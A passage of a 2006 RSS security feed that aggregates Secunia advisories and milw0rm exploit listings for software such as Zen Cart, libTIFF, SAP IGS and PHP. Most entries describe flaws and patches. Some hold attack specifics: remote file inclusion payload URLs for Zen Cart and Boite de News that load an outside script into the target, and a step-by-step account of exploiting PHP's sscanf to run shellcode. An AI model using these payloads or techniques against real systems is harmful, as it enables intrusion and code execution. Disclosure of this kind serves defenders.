2) A boundary error in the functions used for adding items to the playlist can be exploited to cause a buffer overflow via e.g. an overly long URL.<br>
<br>
Successful exploitation may allow execution of arbitrary code, but requires that the GTK interface is used.<br>
<br>
3) Two boundary errors exist in the "cddb_lookup()" function in input/ccda/cdda_engine.c when performing a query to a CDDB server. This can be exploited to cause stack-based buffer overflows when receiving a specially crafted CDDB response.<br>
<br>
Successful exploitation may allow execution of arbitrary code when querying a malicious CDDB server.<br>
<br>
The vulnerabilities have been reported in version 0.99.76. Other versions may also be affected.<br>
<br>
Solution:<br>
Use another product.<br>
<br>
Provided and/or discovered by:<br>
Luigi Auriemma<br>
<br>
Original Advisory:<br>
http://aluigi.altervista.org/adv/alsapbof-adv.txt<br>
]]></description>
            <link>http://secunia.com/advisories/21422/</link>
            <pubDate>Fri, 18 Aug 2006 13:54:18 -0400</pubDate>
        </item>

        <item>
            <title>SAP Internet Graphics Service Two Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21448	Print Advisory  <br>
Release Date:	2006-08-11<br>
Last Update:	2006-08-18<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	SAP Internet Graphics Service (IGS) 6.x<br>
SAP Internet Graphics Service (IGS) 7.x<br>
SAP R/3<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-4133<br>
CVE-2006-4134<br>
<br>
Description:<br>
Mariano Nuñez Di Croce has reported two vulnerabilities in SAP Internet Graphics Service (IGS), which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.<br>
<br>
1) An unspecified error can be exploited to crash the SAP IGS service via a specially crafted HTTP request.<br>
<br>
2) An unspecified boundary error can be exploited to cause a buffer overflow via a specially crafted HTTP request.<br>
<br>
Successful exploitation may allow execution of arbitrary code.<br>
<br>
Solution:<br>
Apply patches for versions 6.40 and 7.00 (see SAP Note 968423 for details).<br>
<br>
Provided and/or discovered by:<br>
Mariano Nuñez Di Croce, Cybsec.<br>
<br>
Changelog:<br>
2006-08-18: Added CVE references.<br>
<br>
Original Advisory:<br>
http://www.cybsec.com/vuln/CYBSE...IGS_Remote_Denial_of_Service.pdf<br>
http://www.cybsec.com/vuln/CYBSE...P_IGS_Remote_Buffer_Overflow.pdf<br>
]]></description>
            <link>http://secunia.com/advisories/21448/</link>
            <pubDate>Fri, 18 Aug 2006 13:53:09 -0400</pubDate>
        </item>

        <item>
            <title>SUSE Update for Multiple Packages</title>
            <description><![CDATA[Secunia Advisory:	SA21467	Print Advisory  <br>
Release Date:	2006-08-15<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	Privilege escalation<br>
DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	SuSE eMail Server 3.x<br>
SUSE Linux 10<br>
SUSE Linux 10.1<br>
SuSE Linux 7.x<br>
SuSE Linux 8.x<br>
SuSE Linux 9.0<br>
SuSE Linux 9.1<br>
SUSE Linux 9.2<br>
SUSE Linux 9.3<br>
SuSE Linux Connectivity Server<br>
SuSE Linux Database Server<br>
SuSE Linux Desktop 1.x<br>
SuSE Linux Enterprise Server 7<br>
SuSE Linux Enterprise Server 8<br>
SUSE Linux Enterprise Server 9<br>
SuSE Linux Firewall on CD/Admin host<br>
SuSE Linux Office Server<br>
SuSE Linux Openexchange Server 4.x<br>
SuSE Linux Standard Server 8<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-1168<br>
CVE-2006-3083<br>
CVE-2006-3084<br>
CVE-2006-3627<br>
CVE-2006-3628<br>
CVE-2006-3629<br>
CVE-2006-3630<br>
CVE-2006-3631<br>
CVE-2006-3632<br>
CVE-2006-3746<br>
CVE-2006-4020<br>
<br>
Description:<br>
SUSE has issued an update for multiple packages. These fix some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, or by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21078<br>
SA21297<br>
SA21402<br>
SA21427<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
Updated packages are available using YaST Online Update or via the SUSE FTP site.<br>
<br>
Original Advisory:<br>
http://lists.suse.com/archive/su...rity-announce/2006-Aug/0006.html<br>
<br>
Other References:<br>
SA21078:<br>
http://secunia.com/advisories/21078/<br>
<br>
SA21297:<br>
http://secunia.com/advisories/21297/<br>
<br>
SA21402:<br>
http://secunia.com/advisories/21402/<br>
<br>
SA21427:<br>
http://secunia.com/advisories/21427/<br>
]]></description>
            <link>http://secunia.com/advisories/21467/</link>
            <pubDate>Fri, 18 Aug 2006 13:52:20 -0400</pubDate>
        </item>

        <item>
            <title>Mambo and Joomla - Too many vulnerabilities - Not a safe application</title>
            <description>Mambo and Joomla  just have way too many vulnerabilities.  No more advisories on this</description>
            <link>http://www.milw0rm.com</link>
            <pubDate>Fri, 18 Aug 2006 13:51:09 -0400</pubDate>
        </item>

        <item>
            <title>IBM WebSphere Application Server Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21487	Print Advisory  <br>
Release Date:	2006-08-15<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	Unknown<br>
Exposure of sensitive information<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	IBM WebSphere Application Server 6.0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Some vulnerabilities have been reported in IBM Websphere Application Server, where one has an unknown impact, and others can potentially be exploited by malicious, local users and by malicious people to disclose sensitive information.<br>
<br>
1) Certain unspecified information may be exposed.<br>
<br>
2) The source code of JSP files may be disclosed.<br>
<br>
3) An error exists due to sensitive information being displayed in the ffdc log.<br>
<br>
4) An unspecified authority problem exists with ThreadIdentitySupport.<br>
<br>
5) Certain user-sensitive information may be exposed in a Trace.<br>
<br>
Other issues which may be security related have also been reported.<br>
<br>
Solution:<br>
Apply version 6.0.2 Fix Pack 13 (6.0.2.13).<br>
http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24012915<br>
]]></description>
            <link>http://secunia.com/advisories/21487/</link>
            <pubDate>Fri, 18 Aug 2006 13:50:27 -0400</pubDate>
        </item>

        <item>
            <title>Zen Cart SQL Injection and File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21484	Print Advisory  <br>
Release Date:	2006-08-16<br>
Last Update:	2006-08-17<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	Manipulation of data<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Workaround<br>
<br>
Software:	Zen Cart 1.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
James Bercegay has reported some vulnerabilities in Zen Cart, which can be exploited by malicious people to conduct SQL injection attacks and compromise a vulnerable system.<br>
<br>
1) Input passed to the "ipn_get_stored_session", "whos_online_session_recreate", and the "add_cart" functions is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.<br>
<br>
2) Certain input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.<br>
<br>
Examples:<br>
http://[host]/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=[remote file]<br>
* The "typefilter" parameter (only local resources)<br>
<br>
The vulnerabilities have been reported in version 1.3.0.2. Other versions may also be affected.<br>
<br>
Solution:<br>
Apply code changes as instructed by the vendor.<br>
http://www.zen-cart.com/forum/showthread.php?t=43579<br>
<br>
Provided and/or discovered by:<br>
James Bercegay, GulfTech Security Research<br>
<br>
Changelog:<br>
2006-08-17: Updated "Solution" section.<br>
<br>
Original Advisory:<br>
http://www.gulftech.org/?node=research&article_id=00109-08152006]]></description>
            <link>http://secunia.com/advisories/21484/</link>
            <pubDate>Fri, 18 Aug 2006 13:49:58 -0400</pubDate>
        </item>

        <item>
            <title>Red Hat update for wireshark</title>
            <description><![CDATA[Secunia Advisory:	SA21488	Print Advisory  <br>
Release Date:	2006-08-16<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	RedHat Enterprise Linux AS 2.1<br>
RedHat Enterprise Linux AS 3<br>
RedHat Enterprise Linux AS 4<br>
RedHat Enterprise Linux ES 2.1<br>
RedHat Enterprise Linux ES 3<br>
RedHat Enterprise Linux ES 4<br>
RedHat Enterprise Linux WS 2.1<br>
RedHat Enterprise Linux WS 3<br>
RedHat Enterprise Linux WS 4<br>
RedHat Linux Advanced Workstation 2.1 for Itanium<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3627<br>
CVE-2006-3628<br>
CVE-2006-3629<br>
CVE-2006-3630<br>
CVE-2006-3631<br>
CVE-2006-3632<br>
<br>
Description:<br>
Red Hat has issued an update for wireshark. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21078<br>
<br>
Solution:<br>
Updated packages are available from Red Hat Network.<br>
http://rhn.redhat.com<br>
<br>
Original Advisory:<br>
http://rhn.redhat.com/errata/RHSA-2006-0602.html<br>
<br>
Other References:<br>
SA21078:<br>
http://secunia.com/advisories/21078/<br>
]]></description>
            <link>http://secunia.com/advisories/21488/</link>
            <pubDate>Fri, 18 Aug 2006 13:49:05 -0400</pubDate>
        </item>

        <item>
            <title>Sony VAIO Media Integrated Server Two Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21512	Print Advisory  <br>
Release Date:	2006-08-16<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	Exposure of system information<br>
Exposure of sensitive information<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	Sony VAIO Media Integrated Server 3.x<br>
Sony VAIO Media Integrated Server 4.x<br>
Sony VAIO Media Integrated Server 5.x<br>
Sony VAIO Media Platform 2.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Pentest Limited has reported some vulnerabilities in Sony VAIO Media Integrated Server, which can be exploited by malicious people to gain knowledge of sensitive information or compromise a vulnerable system.<br>
<br>
1) An unspecified boundary error can be exploited to cause a buffer overflow and execute arbitrary code with SYSTEM privileges.<br>
<br>
2) An unspecified input validation error makes it possible to disclose the contents of arbitrary files on the system via directory traversal attacks.<br>
<br>
Solution:<br>
Install VAIO Media Integrated Server 4.x/5.x Update Program 1.0.00.42120.<br>
<br>
Provided and/or discovered by:<br>
Joe Moore, Pentest Limited.<br>
<br>
Original Advisory:<br>
Sony (Europe):<br>
http://kb.sony-europe.com/kb/solutions/en/V00000_V00499/v00246.html<br>
<br>
Sony (USA):<br>
http://esupport.sony.com/perl/swu-download.pl?upd_id=2207&SMB=YES<br>
<br>
Sony (Japan):<br>
http://vcl.vaio.sony.co.jp/notices/security/info211.html<br>
<br>
Sony (Asia):<br>
http://www.css.ap.sony.com/VAIO/...y_notice/SecurityNotice_VMIS.htm<br>
<br>
Pentest Limited:<br>
http://www.pentest.co.uk/documents/ptl-2006-02.html<br>
]]></description>
            <link>http://secunia.com/advisories/21512/</link>
            <pubDate>Fri, 18 Aug 2006 13:48:36 -0400</pubDate>
        </item>

        <item>
            <title>PHProjekt &quot;path_pre&quot;/&quot;lib_path&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21526	Print Advisory  <br>
Release Date:	2006-08-16<br>
Last Update:	2006-08-17<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	PHProjekt 5.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Kacper has discovered some vulnerabilities in PHProjekt, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "path_pre" parameter in lib/specialdays.php and to the "lib_path" parameter in lib/dbman_filter.inc.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.<br>
<br>
The vulnerabilities have been confirmed in version 5.1. Other versions may also be affected.<br>
<br>
Solution:<br>
Update to version 5.1.1:<br>
http://www.phprojekt.com/download/phprojekt.zip<br>
<br>
Provided and/or discovered by:<br>
Kacper<br>
<br>
Changelog:<br>
2006-08-17: Updated "Solution" section.<br>
]]></description>
            <link>http://secunia.com/advisories/21526/</link>
            <pubDate>Fri, 18 Aug 2006 13:47:42 -0400</pubDate>
        </item>

        <item>
            <title>libTIFF Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21304	Print Advisory  <br>
Release Date:	2006-08-02<br>
Last Update:	2006-08-10<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	LibTIFF 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3459<br>
CVE-2006-3460<br>
CVE-2006-3461<br>
CVE-2006-3462<br>
CVE-2006-3463<br>
CVE-2006-3464<br>
CVE-2006-3465<br>
<br>
Description:<br>
Some vulnerabilities have been reported in libTIFF, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.<br>
<br>
1) A boundary error in the "TIFFFetchShortPair()" function in tif_dirread.c can be exploited to cause a stack-based overflow via a TIFF image file with a specially crafted "DotRange", "YCbCrSubsampling", "HalftoneHints", or "PageNumber" tag.<br>
<br>
2) Boundary errors within the decoders for JPEG, PixarLog, and NeXT RLE streams can be exploited to cause heap-based buffer overflows.<br>
<br>
3) An infinite loop in the "EstimateStripByteCounts()" function can be exploited to cause a DoS.<br>
<br>
4) Various unchecked arithmetic operations, including range check operations, can be exploited to bypass certain sanity checks.<br>
<br>
5) A flaw within the handling of custom tags can lead to abnormal behaviour.<br>
<br>
Successful exploitation allows crashing applications linked against libTIFF or execution of arbitrary code.<br>
<br>
Solution:<br>
Do not open untrusted TIFF images.<br>
<br>
Provided and/or discovered by:<br>
Tavis Ormandy, Google Security Team.<br>
<br>
Changelog:<br>
2006-08-10: Added additional details.<br>
]]></description>
            <link>http://secunia.com/advisories/21304/</link>
            <pubDate>Fri, 18 Aug 2006 13:46:18 -0400</pubDate>
        </item>

        <item>
            <title>Symantec NetBackup PureDisk Authentication Bypass</title>
            <description><![CDATA[Secunia Advisory:	SA21507	Print Advisory  <br>
Release Date:	2006-08-17<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	Security Bypass<br>
Where:	From local network<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	Veritas NetBackup PureDisk Remote Office Edition 6.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
A vulnerability has been reported in Symantec NetBackup PureDisk, which can be exploited by malicious people to bypass certain security restrictions.<br>
<br>
The vulnerability is caused due to an unspecified error during user authentication in the management interface. This can be exploited to bypass the user authentication and gain elevated privileges on the system.<br>
<br>
The vulnerability has been reported in version 6.0 for all platforms.<br>
<br>
Solution:<br>
Apply patch (see vendor advisories for details).<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
Symantec:<br>
http://securityresponse.symantec...security/Content/2006.08.16.html<br>
http://seer.entsupport.symantec.com/docs/284734.htm<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21507/</link>
            <pubDate>Fri, 18 Aug 2006 13:45:20 -0400</pubDate>
        </item>

        <item>
            <title>IBM eGatherer ActiveX &quot;RunEgatherer&quot; Buffer Overflow</title>
            <description><![CDATA[<br>
Secunia Advisory:	SA21528	Print Advisory  <br>
Release Date:	2006-08-17<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	IBM Access Support ActiveX Control (eGatherer) 2.x<br>
IBM Access Support ActiveX Control (eGatherer) 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
eEye Digital Security has reported a vulnerability in the IBM eGatherer ActiveX control, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a boundary error within the RunEgatherer function and can be exploited to cause a stack-based overflow by e.g. tricking a user into visiting a malicious website.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
Solution:<br>
Update to version 3.20.0284.0.<br>
http://www-307.ibm.com/pc/support/IbmEgath.cab<br>
<br>
Provided and/or discovered by:<br>
Andre Derek Protas, eEye Digital Security<br>
<br>
Original Advisory:<br>
http://www.eeye.com/html/research/advisories/AD20060816.html<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21528/</link>
            <pubDate>Fri, 18 Aug 2006 13:44:52 -0400</pubDate>
        </item>

        <item>
            <title>No time to update feed at the moment</title>
            <description>Please visit the sites below&lt;br&gt;&lt;br&gt;
http://www.secunia.com&lt;br&gt;
http://www.securityfocus.com&lt;br&gt;
http://milw0rm.com/&lt;br&gt;</description>
            <link>http://www.upenn.edu/computing/security</link>
            <pubDate>Wed, 16 Aug 2006 09:26:29 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities</title>
            <description><![CDATA[####################################################<br>
#<br>
#<br>
#           C Y B E R - W A R R i O R   T I M<br>
#<br>
#<br>
####################################################<br>
<br>
PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities<br>
<br>
####################################################<br>
<br>
Author: xoron<br>
<br>
####################################################<br>
<br>
Class : Remote<br>
<br>
####################################################<br>
<br>
cont@ct: x0r0n[at]hotmail[dot]com<br>
<br>
####################################################]]></description>
            <link>http://www.milw0rm.com/exploits/2154</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 11:25:16 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: See-Commerce Remote File Inclusion</title>
            <description>CreW: ToXiC&lt;br&gt;&lt;br&gt;
Bug Found by Drago84</description>
            <link>http://www.milw0rm.com/exploits/2155</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 11:24:33 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Boite de News v4.0.1  Remote File Inclusion Vulnerability</title>
            <description><![CDATA[########################################################################<br>
#  Boite de News v4.0.1  Remote File Inclusion Vulnerability<br>
#<br>
#  Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip<br>
#<br>
#  Found By: the master<br>
#<br>
########################################################################<br>
#  exploit:<br>
#<br>
#  http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?<br>
########################################################################<br>
<br>
# milw0rm.com [2006-08-09]]]></description>
            <link>http://www.milw0rm.com/exploits/2153</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 11:23:43 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: HP -= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC</title>
            <description><![CDATA[  Author: Heintz<br>
  Date: 4-th august 2006<br>
  Greets:<br>
  Waraxe from www.waraxe.us<br>
  All buds at www.plain-text.info<br>
  Torufoorum<br>
<br>
  ext/standard/scanf.c line ~887<br>
  ---<br>
  if (numVars) {<br>
                    current = args[objIndex++];<br>
  ---<br>
<br>
  objIndex points past the end of array in other format cases too<br>
<br>
  when php-s sscanf-s format argument contains argument swap<br>
  and extra arguments are given like.<br>
  sscanf('foo ','$1s',$bar) then it reads an pointer to pointer to<br>
  zval structure past the end of argument array by one.<br>
<br>
  This exploit first fills php internally cached memory with address of pointer<br>
  to writable segment. Then by unsetting the variable it frees memory, but does not<br>
  zero it, so this way we pass our own pointers to sscanf.<br>
<br>
  Now sscanf allocated array has valid element one past the array,<br>
  sscanf tries to call a function to destruct zval structure.<br>
  if its 15-th byte isnt anything valid it will default to doing nothing<br>
  and will continue without errors and returns;<br>
<br>
  sscanf now sets the structure to be of type string and writes<br>
  pointer to string  (it matched from our first argument to sscanf) and strings<br>
  length to a structure-s value union. the strings address is written to first 4 bytes<br>
  of structure.<br>
<br>
  knowing this we construct our own binary zval structure of type object. + shellcode + space<br>
  to match format. So now we have successfully called sscanf for the first time<br>
  and we got something like ptrptr->ptr->zval-of-type-string in memory<br>
  zval-of-type-string first 4 bytes point to our object we passed as argument.<br>
<br>
  so now we fill the internal cached memory with just pointer to zval. and free it.<br>
  when sscanf reads the pointer this time it now moves upwards one level but still<br>
  dereferences twice. thus acts upon our zval structure of type object.<br>
  when the destructor function now sees the zval is an object it will read<br>
  a pointer from our structure to another structure which supposed to contain function<br>
  pointers. it will call whatever the 2-cond element points to. all elements are 4 bytes long<br>
  thus address pointed to by structures offset 4 is called.<br>
  when we give it our ptr-to-zval - 4<br>
  it will add 4 bytes to it and dereference it an call whatever is there. and<br>
  there is address to our constructed zval object so we are executing code<br>
  from the beginning of our structure. eip-hop-over will help us through<br>
  unwanted bytes and we are on our way executing our shellcode.<br>
<br>
*/]]></description>
            <link>http://www.milw0rm.com/exploits/2152</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 11:22:29 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Hitweb -= 4.2 (REP_INC) Remote File Include Vulnerability</title>
            <description>Hitweb 4.2 Remote Include File&lt;br&gt;&lt;br&gt;
CreW: ToxiC&lt;br&gt;&lt;br&gt;
Bug Found By Drago84</description>
            <link>http://www.milw0rm.com/exploits/2149</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 09:44:23 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Cwfm -= 0.9.1 (Language) Remote File Inclusion Vulnerability</title>
            <description><![CDATA[+--------------------------------------------------------------------<br>
+<br>
+ Cwfm-0.9.1 (Language) Remote File Inclusion<br>
+<br>
+ Original advisory:<br>
+<br>
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm<br>
+<br>
+--------------------------------------------------------------------<br>
+<br>
+ Affected Software .: Cwfm 0.9.1<br>
+ Venedor ...........: http://cwfm.sourceforge.net/<br>
+ Class .............: Remote File Inclusion in /CheckUpload.php<br>
+ Risk ..............: high (Remote File Execution)<br>
+ Found by ..........: Philipp Niedziela<br>
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de<br>
+                      http://www.bb-pcsecurity.de<br>
+<br>
+--------------------------------------------------------------------]]></description>
            <link>http://www.milw0rm.com/exploits/2151</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 08:59:21 -0400</pubDate>
        </item>

        <item>
            <title>phNNTP &quot;file_newsportal&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21407	Print Advisory  <br>
Release Date:	2006-08-09<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	phNNTP 1.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Tr_ZiNDaN has reported a vulnerability in phNNTP, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "file_newsportal" parameter in article-raw.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been reported in version 1.3. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Tr_ZiNDaN]]></description>
            <link>http://secunia.com/advisories/21407/</link>
            <category>PHP</category>
            <pubDate>Wed, 09 Aug 2006 08:58:35 -0400</pubDate>
        </item>

        <item>
            <title>docpile:we &quot;INIT_PATH&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21412	Print Advisory  <br>
Release Date:	2006-08-09<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	docpile:we 0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Some vulnerabilities have been discovered in docpile:we, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "INIT_PATH" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Affected files:<br>
lib/access.inc.php<br>
lib/auth.inc.php<br>
lib/document.class.php<br>
lib/email.inc.php<br>
lib/folder.class.php<br>
lib/folders.inc.php<br>
lib/init.inc.php (requires PHP5)<br>
lib/templates.inc.php (requires PHP5)<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 0.2.2. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
xoron<br>
]]></description>
            <link>http://secunia.com/advisories/21412/</link>
            <category>PHP</category>
            <pubDate>Wed, 09 Aug 2006 08:57:44 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Comet WebFileManager &quot;Language&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21432	Print Advisory  <br>
Release Date:	2006-08-09<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Comet WebFileManger 0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Philipp Niedziela has discovered a vulnerability in Comet WebFileManager, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "Language" parameter in CheckUpload.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.<br>
<br>
The vulnerability has been confirmed in version 0.9.1. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Philipp Niedziela<br>
<br>
Original Advisory:<br>
http://www.bb-pcsecurity.de/Webs...guage)_Remote_File_Inclusion.htm<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21432/</link>
            <category>Exploits</category>
            <pubDate>Wed, 09 Aug 2006 08:56:13 -0400</pubDate>
        </item>

        <item>
            <title>Novell GroupWise WebAccess Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21411	Print Advisory  <br>
Release Date:	2006-08-08<br>
Last Update:	2006-08-09<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	Cross Site Scripting<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	Novell Groupwise 6.x<br>
Novell GroupWise 7.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3817<br>
CVE-2006-3818<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Novell GroupWise, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks.<br>
<br>
1) Some errors caused due to the application failing to properly sanitise HTML emails can be exploited to include arbitrary script code in HTML emails, which will be executed in a user's browser session in context of an affected site when the malicious email is viewed.<br>
<br>
Examples:<br>
* UTF-7 encoded script tags.<br>
* Some malformed HTML containing script code.<br>
<br>
The vulnerabilities have been reported in versions 7 and 6.5. Other versions may also be affected.<br>
<br>
2) Certain input passed in the login page is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.<br>
<br>
Solution:<br>
The vulnerabilities have been fixed in Hot Patch GroupWise 7 SP2 WebAccess Rev A.<br>
<br>
Provided and/or discovered by:<br>
1) Francisco Amato, Infobyte Security Research.<br>
2) The vendor credits Jerome Odegaard.<br>
<br>
Changelog:<br>
2006-08-09: Added additional information provided by Francisco Amato. Increased criticality. Added Novell Groupwise 6.x as affected.<br>
<br>
Original Advisory:<br>
Novell:<br>
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974242.htm<br>
<br>
Infobyte Security Research:<br>
http://www.infobyte.com.ar/adv/ISR-14.html<br>
]]></description>
            <link>http://secunia.com/advisories/21411/</link>
            <category>Novell</category>
            <pubDate>Wed, 09 Aug 2006 08:55:47 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: phNNTP -= 1.3 (article-raw.php) Remote File Include Vulnerability</title>
            <description>phNNTP v1.3 Remote File Inclusion&lt;br&gt;&lt;br&gt;
CreW: ToxiC&lt;br&gt;&lt;br&gt;
Bug Found By Drago84&lt;br&gt;&lt;br&gt;</description>
            <link>http://www.milw0rm.com/exploits/2148</link>
            <category>Exploits</category>
            <pubDate>Tue, 08 Aug 2006 11:47:49 -0400</pubDate>
        </item>

        <item>
            <title>New phishing trojan transfers info via ICMP</title>
            <description>The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet.</description>
            <link>http://www.websense.com/securitylabs/alerts/alert.php?AlertID=570</link>
            <category>News</category>
            <pubDate>Tue, 08 Aug 2006 11:45:53 -0400</pubDate>
        </item>

        <item>
            <title>Researchers Warn of Serious BlackBerry Vulnerability</title>
            <description><![CDATA[ 	<br>
Security Header<br>
<br>
<br>
Researchers Warn of Serious BlackBerry Vulnerability<br>
